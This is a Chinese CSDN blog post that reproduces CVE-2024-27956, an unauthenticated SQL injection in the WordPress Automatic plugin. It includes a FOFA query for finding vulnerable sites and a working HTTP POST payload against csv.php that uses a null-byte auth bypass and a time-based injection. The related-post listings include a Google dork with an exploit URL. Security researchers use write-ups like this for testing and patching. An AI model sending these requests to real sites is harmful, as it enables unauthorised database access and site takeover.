【漏洞复现】WordPress Automatic SQL注入漏洞(CVE-2024-27956)

最新推荐文章于 2024-06-20 16:58:55 发布
最新推荐文章于 2024-06-20 16:58:55 发布
阅读量353 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138540344
版权
本文介绍了WordPress Automatic Plugin的一个安全漏洞,该漏洞允许未授权攻击者通过SQL注入获取数据库敏感信息。详细讲述了漏洞概述、影响范围,并提供了漏洞复现的步骤。
摘要由CSDN通过智能技术生成

0x01 产品简介

WordPress Automatic Plugin是一款功能强大的WordPress插件,旨在帮助用户自动采集并发布内容。这款插件支持从各种来源自动采集内容,包括但不限于RSS源、网站、YouTube、eBay等。用户可以根据自己的需求设置采集规则,选择要采集的内容类型、关键词、发布时间等。一旦设置完成,插件会自动按照规则定时采集内容,并发布到WordPress网站上。

0x02 漏洞概述

WordPress Automatic Plugin 小于 3.92.0 的版本存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。

0x03 测绘语句

fofa: body="/wp-content/plugins/wp-automatic"

0x04 漏洞复现

漏洞复现:

POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded



q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)
qq_67810151的博客
03-27 430
WordPress Automatic Plugin 小于 3.92.1 的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
0xSec
05-01 1071
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
漏洞复现WordPress Automati插件-SQL注入-ccsv.php(CVE-2024-27956)
最新发布
知黑而守白
06-20 47
wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress Automati插件 ccsv.php接口处存在 SQL注入漏洞**,**恶意攻击者可能会利用该漏洞执行恶意SQL语句,查看用户名密码等,造成信息泄露,最终可能会导致服务器失陷。影响版本。
WordPress 文件下载漏洞
深蓝旭的博客
08-23 815
Google dork:inurl:"/wp-content/themes/liberator/inc/php/download.php" exploit:https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php google dork: inurl:"/wp-content/themes/newspro2891/download.ph...
WordPress Automatic SQL注入漏洞
weixin_43167326的博客
05-02 963
WordPress Plugin WP Automatic 存在SQL注入漏洞(CVE-2024-27956),该漏洞允许未经身份验证的远程攻击者执行任意SQL代码,获取数据库的敏感信息,或者对数据库进行增、删、改、查等危险操作。
[漏洞分析]WordPress未经身份验证的远程代码执行CVE-2024-25600
网络安全知识分享
03-14 1593
Bricks
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
CVE-2024-27954 WordPress Automatic插件 SSRF与任意文件读取漏洞分析
shelter1234567的博客
05-27 509
WordPress Automatic 插件
漏洞复现WordPress AutomaticPlugin SSRF漏洞
https://blog.echo234.cn/
04-02 408
WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。
WordPress AutomaticPlugin SSRF漏洞复现(CVE-2024-27954)
0xSec
03-31 517
WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。
重大安全事件,10亿中国键盘应用用户遭难,众多国内大厂中枪;漂亮国支持黑客利用0day漏洞进行间谍活动;“七年之痛”?利用Office七年前的旧漏洞攻击乌克兰; | 安全周报0428
weixin_55163056的博客
04-28 1193
关键词:拼音键盘应用、百度、华为、0day漏洞、npm包、WordPress、WP-Automatic插件
WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)(含批量验证poc)_wordpress插件漏洞批量
m0_59117112的博客
04-15 406
WordPress Automatic Plugin 小于3.92.1的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。
黑客利用插件漏洞WordPress 网站上创建管理员帐户
w3cschools的博客
05-06 635
郭盛华还警告Poll Maker 插件中存在未修补的问题(CVE-2024-32514,CVSS 评分:9.9),该问题允许经过身份验证的攻击者(具有订户级及以上访问权限)在受影响站点的服务器上上传任意文件,从而导致远程代码执行。在迄今为止观察到的攻击中,CVE-2024-27956 被用于未经授权的数据库查询,并在易受影响的 WordPress 网站上创建新的管理员帐户(例如,以“xtw”开头的名称),然后可以利用这些帐户进行后续攻击。此后,已检测到超过 550 万次将该漏洞武器化的攻击尝试。
漏洞分析 | WordPress Bricks Builder远程代码执行漏洞(CVE-2024-25600)
WangsuSecurity的博客
03-15 1080
WordPress小于1.9.6版本的默认配置中存在远程代码执行漏洞,利用条件简单,影响范围甚广
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值